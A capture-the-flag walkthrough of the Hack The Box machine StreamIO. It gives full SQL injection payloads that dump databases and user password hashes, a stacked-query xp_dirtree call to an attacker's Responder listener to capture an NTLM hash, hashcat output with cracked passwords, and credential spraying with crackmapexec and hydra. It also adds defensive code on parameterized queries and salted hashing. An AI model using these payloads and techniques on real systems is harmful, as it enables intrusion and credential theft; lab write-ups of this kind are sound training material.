▶️StreamIO

https://app.hackthebox.com/machines/474

First we start by going through all the open ports without being too verbose:

nmap -p- --min-rate 10000 10.129.77.104

Then we do a verbose service and script scan (-sCV) of the open ports:

nmap -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.77.104

Based on the IIS Version on 80, the host is likely running Windows 10+ or Server 2016+.

The combination of services (DNS 53, Kerberos 88, LDAP 389/636/3268/3269, SMB 445, RPC 135, NetBIOS 139, and others) suggests this is a domain controller.

On port 443 we can see two DNS names to put in our /etc/hosts: streamIO.htb and watch.streamIO.htb

After fuzzing for virtual hosts on 80 and 443, we only found the watch. subdomain, so we can go and enumerate SMB (445) now:

crackmapexec smb 10.129.77.104

So now we can add DC.streamIO.htb to the hosts file

Anonymous login did not work on the SMB shares, so let's start looking at the websites:

Port 80 is just the default IIS page; on the other hand, streamIO.htb on port 443 (HTTPS) is interesting:

on the about page:

Maybe some possible users?

We see some links that end with .php, so maybe fuzzing with the php extension is the way to go for feroxbuster?

feroxbuster -u https://streamio.htb -x php -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k

We get some pretty interesting pages

that's quite interesting

So let's go to the login page, which has a little register button under it:

Let's register -> Felix/Felix

Even after registering, I can't log in?

Let's pivot to their other platform, watch.

Note that every hostname over HTTP redirects to the IIS page, and over HTTPS to the interesting site ⁉️

I subscribed with test@test.com and got this response:

Let's try to find some pages on this one too:

feroxbuster -u https://watch.streamio.htb -x php -w

The only page that seemed interesting was blocked.php:

Aye, we have got to be extra cautious

After a second look, search.php was interesting:

All the watch buttons pop this up:

Let's see if we can get some stuff out of this:

So it's clearly using a wildcard search, something like *the*

So the query could look something like:

select * from movies where title like '%the%';

So if in the input I enter something like the';-- -

Yeah, just as I thought: it returns every movie whose title ENDS with "the", because the pattern is now '%the' instead of '%the%' (the closing quote ends the string, the ; ends the statement and -- comments out the rest)

Playing with the input, we can easily find the query that prints everything:

Now let's use the column tricks I learned in the SQL documentation:

SQL Injection (linked notes page)

damn first try 😂

snatch' union select null#

OK, so after waiting for an hour I was not really blocked. After looking for a session id or anything else that could have blocked me, I found I was just being redirected to the blocked.php page, so the filter on the input is probably case sensitive ->

this does not redirect me:

snatch' union 1;-- -

After troubleshooting, a payload with a typo returns nothing at all, which is very weird:

abcd' union select 1,2,3,4,5,6;-- -

abcd' union select 1,2,3,4,5,6;-- - injects a second query into the legitimate SQL query and pulls data from the database through it. The union keyword joins the results of the original query and the injected query, and the select lists the values to return (six of them, so the column count matches the original query). The closing quote ends the original string, ; terminates the statement, and -- starts a comment that swallows the rest of the original query (the trailing space and - only make sure the comment marker is followed by whitespace, so it survives any trimming).

I'll try to get the DB version. This cheat sheet shows how for different database types. It's fair to guess that this is either MSSQL (since it's Windows) or MySQL (very common with PHP). Both of those use @@version, and it works:

Let's try stacked queries to get a Net-NTLMv2 hash:

After setting up Responder ->

responder -I tun0 -wrf

and input:

abcd'; use master; exec xp_dirtree '\\10.10.14.166\share';-- -

We get some form of response:

Unfortunately hashcat won't crack it: it's a machine account hash, so it's unlikely to be crackable ->

abcd'union select 1,name,3,4,5,6 from master..sysdatabases;-- -
  • union select 1,name,3,4,5,6 is the injected second query. The select keyword specifies the columns to return: here the literal values 1, 3, 4, 5 and 6, plus the name column from the master..sysdatabases table.

  • from master..sysdatabases specifies the table the data is selected from. The master database holds system information about the instance, and the sysdatabases table lists every database on the server.

The purpose of this query is to extract the names of all databases on the server. The union keyword combines the results of the original query with those of the injected query. By selecting the name column from sysdatabases, we get the name of every database on the server. The values 1, 3, 4, 5 and 6 are padding so that both queries return the same number of columns, which union requires.
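As an added example (mine, not part of the original writeup): the query shape inferred above, built by string concatenation versus with a bound parameter, run against a constructed SQLite catalogue. It shows why the';-- - narrows the match to titles ending in "the", why a union with the wrong column count is rejected by the database, why six matching columns let another table ride along in the result, and why the parameterized version treats every payload as a plain search term. The table and column names are assumptions; only the six-column width mirrors the page, and SQLite concatenates with || where the page used MSSQL's concat().

```python
import sqlite3

# Constructed stand-in for the STREAMIO movies table. The real table has six
# columns (hence the 1,2,3,4,5,6 padding in the payloads above); the column
# names here are assumptions, not the site's schema.
MOVIES = [
    ("Snatch", 2000, "Crime", "Guy Ritchie", 104, 1),
    ("The Godfather", 1972, "Crime", "Francis Ford Coppola", 175, 1),
    ("Gone with the Wind", 1939, "Drama", "Victor Fleming", 238, 1),
    ("Meet the", 2001, "Comedy", "Unknown", 90, 1),  # constructed: ends in "the"
    ("Catch Me If You Can", 2002, "Crime", "Steven Spielberg", 141, 1),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database with a movies table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (title TEXT, year INT, genre TEXT, "
        "director TEXT, minutes INT, active INT)"
    )
    conn.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?)", MOVIES)
    conn.execute("CREATE TABLE users (id INT, username TEXT, password TEXT)")
    # constructed placeholder, not a real hash from the box
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'HASH_PLACEHOLDER')")
    return conn


def search_vulnerable(conn, term):
    """The search.php shape inferred on the page: user input pasted into the SQL."""
    sql = f"select * from movies where title like '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Same search with a bound parameter: the wildcards are ours, the input is data."""
    sql = "select * from movies where title like ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def probe(conn, term):
    """Run the vulnerable search and report either the rows or the database's error text."""
    try:
        return "ok", search_vulnerable(conn, term)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def titles(rows):
    """Project result rows down to the title column."""
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # plain search: every title containing "the" (SQLite LIKE ignores ASCII case)
    print(titles(search_vulnerable(db, "the")))
    # the';-- - closes the string, ends the statement and comments out the trailing %',
    # so only titles that END with "the" come back
    print(titles(search_vulnerable(db, "the';-- -")))
    # a union whose column count does not match the original select is rejected
    print(probe(db, "abcd' union select 1,2,3 from users;-- -"))
    # with six columns the users table rides along in the movie results
    print(probe(db, "abcd' union select 1,username||':'||password,3,4,5,6 from users;-- -"))
    # the parameterized search returns nothing for either payload
    print(search_safe(db, "the';-- -"))
    print(search_safe(db, "abcd' union select 1,2,3,4,5,6 from users;-- -"))
```

The fix is the single bound parameter in search_safe: the database compiles the statement before it ever sees the input, so quotes, semicolons and comment markers in the term are just characters to match.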

We can see in this doc that all of those are system DBs; our DB is STREAMIO

So to continue our SQLi, I look at the syntax on the website:

abcd'union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';-- -

We continue our way in:

abcd' union select 1,name,id,4,5,6 from streamio..syscolumns where id in (885578193,901578250);-- -

We got the interesting tables, so now we'll try getting both at once:

abcd'union select 1,username,3,4,5,6 from users;-- -

We could try to do the same for the password and go from there, but let's directly concat the two in one query:

abcd'union select 1,concat(username,':',password),3,4,5,6 from users;-- -

So we put the hashes in a txt file and start cracking them with hashcat:

hashcat hashesStreamio.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show
  • --user (short for --username) tells hashcat that each line of the hash file is prefixed with a username (user:hash); hashcat ignores the prefix while cracking and prints it again with --show.

  • -m 0 sets the hash mode to 0, raw MD5, which matches the 32-hex-character hashes we pulled from the database.

  • --show prints the hashes hashcat has already cracked (from its potfile) next to their plaintexts.

You can do it with all of them at once:

admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
dfdfdf:ae27a4b4821b13cad2a17a75d219853e:dfdfdf
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
[...]
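As an added example (mine, not the author's): the reason the dump fell this quickly is visible in -m 0. The site stored raw, unsalted MD5, so one pass over a wordlist serves every user at once. The block below contrasts that storage with a salted PBKDF2 scheme a defender would use instead, and includes a small triage helper for user:hash lines. All inputs are constructed; the user:hash line format handled by triage_dump is an assumption modelled on the output above, and the 600,000 iteration count is OWASP's published figure for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

PBKDF2_ITERATIONS = 600_000  # OWASP's figure for PBKDF2-HMAC-SHA256


def legacy_md5(password: str) -> str:
    """How the dumped passwords were stored: one unsalted MD5 per password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def looks_like_unsalted_md5(value: str) -> bool:
    """Triage check: exactly 32 hex characters and nothing else is almost certainly raw MD5."""
    value = value.strip().lower()
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def wordlist_recover(md5_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What hashcat -m 0 does: hash each candidate and compare. With no salt the
    same candidate hash is valid for every user in the dump, which is why the
    whole table cracks in one run."""
    for candidate in wordlist:
        if legacy_md5(candidate) == md5_hex:
            return candidate
    return None


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Corrected storage: random per-user salt plus a slow KDF, serialized as one string."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def triage_dump(lines: Iterable[str]) -> dict:
    """Classify constructed user:hash lines so weak storage stands out in a review."""
    verdicts = {}
    for line in lines:
        user, stored = line.split(":", 1)
        verdicts[user] = "unsalted-md5" if looks_like_unsalted_md5(stored) else "other"
    return verdicts


if __name__ == "__main__":
    constructed_wordlist = ["letmein", "password", "paddpadd"]
    weak = legacy_md5("paddpadd")
    print("recovered from unsalted md5:", wordlist_recover(weak, constructed_wordlist))
    strong = hash_password("paddpadd")
    print("pbkdf2 record:", strong)
    print("verify ok:", verify_password("paddpadd", strong), "wrong pw:", verify_password("wrong", strong))
    print(triage_dump(["admin:" + weak, "bob:" + strong]))
```

The salt does not stop a single weak password from being guessed, but it forces a separate run per user and the iteration count makes each guess expensive; together they turn the one-shot crack above into a per-account cost.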

Now if you want to split users and passwords in bulk:

cat hashesStreamio | cut -d: -f1 > user
cat hashesStreamio | cut -d: -f3 > pass

Then to test all the credentials against SMB:

crackmapexec smb 10.129.238.190 -u USER -p PASS --no-bruteforce --continue-on-success

Unfortunately, everything fails

But we still have valid creds, so it's not too hard to guess where we need to go next:

We could try them all manually, but let's automate:

Let's format the list for hydra (one login:password pair per line):

cat HASHESV2 | cut -d: -f1,3 > userpass
hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"

Which will output:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-12 21:54:58
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-12 21:55:00

We are able to connect and after further enumeration, access the admin page:

I am able to delete some stuff from the database:
